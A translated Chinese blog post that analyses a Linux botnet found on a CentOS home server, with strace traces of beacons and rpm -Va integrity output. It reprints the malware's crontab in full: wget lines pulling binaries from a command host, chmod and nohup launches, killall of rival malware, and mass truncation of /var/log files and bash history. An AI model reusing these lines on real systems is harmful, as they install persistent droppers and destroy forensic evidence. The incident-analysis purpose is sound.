基於Linux平臺下的僵屍網路病毒《比爾蓋茨》
阿新 • • 發佈:2018-12-29
感覺分析的很好,所以決定翻譯出來,希望和大家多多交流O(∩_∩)O~
轉載請註明出處:http://blog.csdn.net/u010484477 O(∩_∩)O謝謝
關鍵字:病毒,linux,資訊保安
我昨天寫的日誌裡面提到,家用路由器在x86的CentOS系統下奇怪的自己行動,像是在自己載入處理器。於是我決定爬上去看看,在那裡發生了什麼,然後我馬上意識到有人爬到伺服器和掛在程序中的dgnfd564sdf.com。主要是下面幾個方面atddd,cupsdd,cupsddh, ksapdd, kysapdd, skysapdd , xfsdxd等等
root 4741 起初我摸索著看,到底是什麼讓我的電腦如此的妥協。第一件事,我想到/ etc / rc.local檢查。有如下:
cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd# crontab -e
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
…
*/1 * * * * killall -9 nfsd4
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
…
*/1 * * * * killall -9 profild.key
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
…
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
…
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
…
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
…
*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
…
…
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
…
# Edit this file to introduce tasks to be run by cron.
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.當我進入到伺服器,這些過程已經不是什麼都不做(不被處理器,沒有使用網路)。他們已經決定停止執行,恢復業務,不讓這些現有的特徵一直存在,防止被人發現。他們的strace命令就是這樣的:
[[email protected] etc]# strace -p 3312
Process 3312 attached - interrupt to quit
[ Process PID=3312 runs in 32 bit mode. ]
restart_syscall(<... resuming interrupted call ...>) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL) = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR) = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3) = 0
nanosleep({15, 0}, NULL) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL) = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR) = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3) = 0
nanosleep({15, 0},
[[email protected] etc]# strace -p 3268
Process 3268 attached - interrupt to quit
[ Process PID=3268 runs in 32 bit mode. ]
recv(3, 0xfff19338, 4, 0) = -1 ECONNRESET (Connection reset by peer)
close(3) = 0
futex(0x816e8a8, FUTEX_WAKE, 1) = 1
futex(0x816e8a4, FUTEX_WAKE, 1) = 1
nanosleep({15, 0}, NULL) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL) = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR) = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = 401
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0) = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0) = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, ^C <unfinished ...>
Process 3268 detachedunset MAILCHECK這意味著在計算機上的僵屍網路是大約7小時。可能實際上沒有那麼多,但不低。
現在需要檢查是否已修改任何系統檔案。在CentOS這足夠的執行:
rpm -Va[[email protected] ~]# rpm -Va
S.5....T. c /etc/ppp/chap-secrets
S.5....T. c /etc/issue
S.5....T. c /etc/crontab
S.5....T. c /etc/nagiosgraph/access.conf
S.5....T. c /etc/nagiosgraph/nagiosgraph.conf
.M....... /usr/lib/nagiosgraph/cgi-bin/show.cgi
.M....... /usr/lib/nagiosgraph/cgi-bin/showconfig.cgi
.M....... /usr/lib/nagiosgraph/cgi-bin/showgraph.cgi
.M....... /usr/lib/nagiosgraph/cgi-bin/showgroup.cgi
.M....... /usr/lib/nagiosgraph/cgi-bin/showhost.cgi
.M....... /usr/lib/nagiosgraph/cgi-bin/showservice.cgi
.M....... /usr/lib/nagiosgraph/cgi-bin/testcolor.cgi
.M....... /usr/share/nagiosgraph/htdocs/nagiosgraph.css
.M....... /usr/share/nagiosgraph/htdocs/nagiosgraph.js
S.5....T. /var/log/nagiosgraph/nagiosgraph-cgi.log
S.5....T. /var/log/nagiosgraph/nagiosgraph.log
missing /usr/java/jre1.7.0_40/lib/install.jar
....L.... /lib/modules/2.6.32-358.2.1.el6.x86_64/build
S.5....T. c /etc/tor/torrc
.M....... /
.......T. c /etc/ppp/options.pptpd
S.5....T. c /etc/pptpd.conf
....L.... c /etc/pam.d/fingerprint-auth
....L.... c /etc/pam.d/password-auth
....L.... c /etc/pam.d/smartcard-auth
....L.... c /etc/pam.d/system-auth
S.5....T. c /etc/rsyslog.conf
S.5....T. c /etc/rc.d/rc.local
..5....T. c /etc/sysctl.conf
S.5....T. c /etc/vsftpd/vsftpd.conf
.M....... /var/ftp/pub
..5....T. c /etc/sysconfig/PlexMediaServer
.......T. /usr/lib/plexmediaserver/start.sh
S.5....T. c /etc/sysconfig/lm_sensors
S.5....T. c /etc/php.ini
S.5....T. c /etc/httpd/conf/httpd.conf
.......T. /etc/rc.d/init.d/deluge-daemon
S.5....T. c /etc/cacti/db.php
S.5....T. c /etc/cron.d/cacti
S.5....T. c /etc/httpd/conf.d/cacti.conf
.M....... /usr/share/cacti
.M....... /usr/share/cacti/about.php
.M....... /usr/share/cacti/auth_changepassword.php
.M....... /usr/share/cacti/auth_login.php
.M....... /usr/share/cacti/cdef.php
.M....... /usr/share/cacti/cmd.php
.M....... /usr/share/cacti/color.php
.M....... /usr/share/cacti/data_input.php
.M....... /usr/share/cacti/data_queries.php
.M....... /usr/share/cacti/data_sources.php
.M....... /usr/share/cacti/data_templates.php
.M....... /usr/share/cacti/gprint_presets.php
.M....... /usr/share/cacti/graph.php
.M....... /usr/share/cacti/graph_image.php
.M....... /usr/share/cacti/graph_settings.php
.M....... /usr/share/cacti/graph_templates.php
.M....... /usr/share/cacti/graph_templates_inputs.php
.M....... /usr/share/cacti/graph_templates_items.php
.M....... /usr/share/cacti/graph_view.php
.M....... /usr/share/cacti/graph_xport.php
.M....... /usr/share/cacti/graphs.php
.M....... /usr/share/cacti/graphs_items.php
.M....... /usr/share/cacti/graphs_new.php
.M....... /usr/share/cacti/host.php
.M....... /usr/share/cacti/host_templates.php
.M....... /usr/share/cacti/images
.M....... /usr/share/cacti/images/arrow.gif
.M....... /usr/share/cacti/images/auth_deny.gif
.M....... /usr/share/cacti/images/auth_login.gif
.M....... /usr/share/cacti/images/auth_logout.gif
.M....... /usr/share/cacti/images/button_add.gif
.M....... /usr/share/cacti/images/button_cancel.gif
.M....... /usr/share/cacti/images/button_cancel2.gif
.M....... /usr/share/cacti/images/button_clear.gif
.M....... /usr/share/cacti/images/button_colapse_all.gif
.M....... /usr/share/cacti/images/button_create.gif
.M....... /usr/share/cacti/images/button_default.gif
.M....... /usr/share/cacti/images/button_delete.gif
.M....... /usr/share/cacti/images/button_expand_all.gif
.M....... /usr/share/cacti/images/button_export.gif
.M....... /usr/share/cacti/images/button_go.gif
.M....... /usr/share/cacti/images/button_help.gif
.M....... /usr/share/cacti/images/button_import.gif
.M....... /usr/share/cacti/images/button_no.gif
.M....... /usr/share/cacti/images/button_purge.gif
.M....... /usr/share/cacti/images/button_refresh.gif
.M....... /usr/share/cacti/images/button_save.gif
.M....... /usr/share/cacti/images/button_view.gif
.M....... /usr/share/cacti/images/button_yes.gif
.M....... /usr/share/cacti/images/cacti_about_logo.gif
.M....... /usr/share/cacti/images/cacti_backdrop.gif
.M....... /usr/share/cacti/images/cacti_backdrop2.gif
.M....... /usr/share/cacti/images/cacti_logo.gif
.M....... /usr/share/cacti/images/calendar.gif
.M....... /usr/share/cacti/images/delete_icon.gif
.M....... /usr/share/cacti/images/delete_icon_large.gif
.M....... /usr/share/cacti/images/disable_icon.png
.M....... /usr/share/cacti/images/enable_icon.png
.M....... /usr/share/cacti/images/enable_icon_disabled.png
.M....... /usr/share/cacti/images/favicon.ico
.
相關推薦
基於Linux平臺下的僵屍網路病毒《比爾蓋茨》
感覺分析的很好,所以決定翻譯出來,希望和大家多多交流O(∩_∩)O~
轉載請註明出處:http://blog.csdn.net/u010484477 O(∩_∩)O謝謝
關鍵字:病毒,linux,資訊保安
我昨天寫的日誌裡面提到,家用路由器在x86的
基於Linux平臺下網路病毒Tsunami原始碼解析(病毒功能挺經典的)
最近在進行病毒樣本的解析,無意間看到了Tsunami病毒的原始碼,進行了一次解析,和大家共同交流
轉載請註明出處:http://blog.csdn.net/u010484477 O(∩_∩)O謝謝
/*
* !* SH uname -a *
新的僵屍網路病毒出現,感染“HDFS”發動DDoS功擊
我們都知道,DDOS功擊主要是通過大量的“肉雞”來進行發動的,要發動DDOS功擊首先需要大量的僵屍網路“肉雞”。根據相關媒體最新報道,一個全新的僵屍網路病毒正在以“HDFS”為目標,感染其成為“肉雞”,利用它們的計算能力發動分散式拒絕服務(DDoS)功擊。
什麼是“HDFS”呢?“HDFS”的全稱是
基於Linux平臺病毒Wirenet.c解析
在分析Wirenet.c時,感覺自己學到了很多很讚的思想,希望跟大家一同交流。
這次並不想通篇的進行分析了,我想寫出兩塊病毒的惡意程式碼,覺得思想挺好的。
一、刪除某目錄下的所有檔案
pathpoint = opendir(path); //開啟一個目錄
dirent
BOTCHAIN:第一個基於比特幣協議的功能齊全的僵屍網路
前言
近期,來自Cybaze公司ZLab惡意軟體實驗室的安全專家Antonio Pirozzi和Pierluigi Paganini介紹了一款名叫BOTCHAIN的僵屍網路,而它是世界上第一款基於比特幣協議構建的全功能僵屍網路。
區塊鏈技術能夠以可靠的方式驗證通訊雙方
Linux平臺下基於BitTorrent應用層協議的下載軟體開發--Main函式模組(main.c)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <malloc.h>
#include
linux平臺下基於C語言實現遍歷檔案目錄
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h&g
Oracle基於Linux 7下的安裝
oracle linux 一、環境:1、WMware Workstation2、linux 7.0 64位 iso3、安裝包:p13390677_112040_Linux-x86-64_1of7.zipp13390677_112040_Linux-x86-64_2of7.zip二、創建新虛擬機:文件-
linux平臺下防火墻iptables原理(轉)
arch inux 方式 輸出結果 取反 地址 angle 啟動 internet iptables簡介
netfilter/iptables(簡稱為iptables)組成Linux平臺下的包過濾防火墻,與大多數的Linux軟件一樣,這個包過濾防火墻是免費的,它可以
Linux系統基礎知識(二)基於linux系統下的用戶管理操作以及文件操作補充
c99 數據塊 upa 系統數據 精確 passwd 列表 sudo 3.4 1、(思考)系統中為什麽要有用戶
1.1用戶??系統中最底層的安全設定,回收(限制)權利。1.2組??共享權利。分為以下兩種:??(1)附加組:由用戶決定的組(每個用戶不一定都有);??(2)初始
最新Chalubo僵屍網路來襲,目標指向伺服器和物聯網裝置
網路安全公司Sophos旗下SophosLabs在本週一(10月22日)發表的一篇博文中指出,他們近兩個月一直在持續關注一場開始於9月初的網路攻擊活動,目標是開啟了SSH伺服器的Linux伺服器。而在這場攻擊活動中,攻擊者的主要目的在於傳播一種被他們稱之為“Chalubo”的最新自動化DDos攻擊工
Python指令碼暴力破解SSH口令以及構建僵屍網路(pxssh)
目錄
暴力破解SSH口令
SSH遠端執行命令
構建僵屍網路
環境:Kali Linux python 2.7.13
暴力破解SSH口令
Pxssh是pexpect庫的ssh專用指令碼,他能用預先寫好的 login()、logout() 和 pro
曲速未來 訊息|俄羅斯最新的MaaS僵屍網路:Black Rose Lucy
前言:
區塊鏈安全公司 曲速未來 表示:近年來我們看到網路犯罪分子越來越多地聘請網路僱傭兵和惡意軟體即服務(MaaS)提供商作為開展惡意活動的一種方式,從而更加註意這一建議。許多威脅演員更傾向於僱用具有更專業技能的較小團隊,而不是聚集擁有完全從頭開始攻擊所需的必要技能組的全能團
曲速未來 披露:新的僵屍網路隱藏在區塊鏈DNS霧中並刪除Cryptominer
DNS (域名系統)
DNS代表域名服務,它是網際網路的電話簿。將域名(如amazon.com)對映到IP地址(如123.456.789)的域名系統(DNS)。域名系統通過編號分配機構ICANN和註冊服務商進行偽分散治理。雖然不是盡善盡美,但我們必須要讚揚它,作為網際網路基礎設
學習筆記(十):使用支援向量機區分僵屍網路DGA家族
1.資料蒐集和資料清洗
·1000個cryptolocker域名
·1000個post-tovar-goz域名
·alexa前1000域名
&n
HNS物聯網僵屍網路現在通過Wi-Fi使用ADB傳播到新的Android裝置
據Bitdefender實驗室報道,新的Hide and Seek變種能夠通過利用Android開發人員用於故障排除的Android除錯橋(ADB)功能在網路中招募新機器人。
雖然並非所有的Android裝置都預設啟用ADB,但是一些Android廠商決定讓它自動啟用,通過5555使用Wi-Fi ADB遠端
byob--建立自己的僵屍網路
BYOB是一個開源專案,為安全研究人員和開發人員提供構建和執行基本僵屍網路的框架,以加深他們對每年感染數百萬裝置併產生現代僵屍網路的複雜惡意軟體的理解,以提高他們的能力,制定應對這些威脅的對策。
它旨在允許開發人員輕鬆實現自己的程式碼並新增新功能,而無需從頭開始編寫RAT(遠端管理工具)或 C2(命令和控制
Golang 入門基礎教程(二)Linux 平臺下安裝Golang基礎環境
Linux平臺下安裝Golang的話可以直接下載官方原始碼包,
注意:如果系統內安裝過其他版本的Golang原始碼包,必須先將之前的清除掉
1、解壓原始碼包
解壓原始碼包到 /usr/local目錄下
> sudo tar -C /usr/local
Linux平臺下下載百度網盤裡的資源
工作中大部分使用的是Linux系統,經常會遇到需要下載資源的情況,這時候就懵逼了,Linux下根本沒有百度網盤客戶端啊,雖然可以隨時切換到windows環境下,繼續下載,但是終歸不是好辦法。所以今天就特意找了下相關方法,一搜還真多,七七八八的都不知道選哪個好。看上去都是比較複雜又要搞原始碼又要搞配置
Linux 平臺下的漏洞掃描器 Vuls
Vuls 是一款適用於 Linux/FreeBSD 的漏洞掃描程式,無代理,採用 Go 語言編寫,對於系統管理員來說,每天必須執行安全漏洞分析和軟體更新都是一個負擔。
為避免生產環境宕機,系統管理員通常選擇不使用軟體包管理器提供的自動更新選項,而是手動執行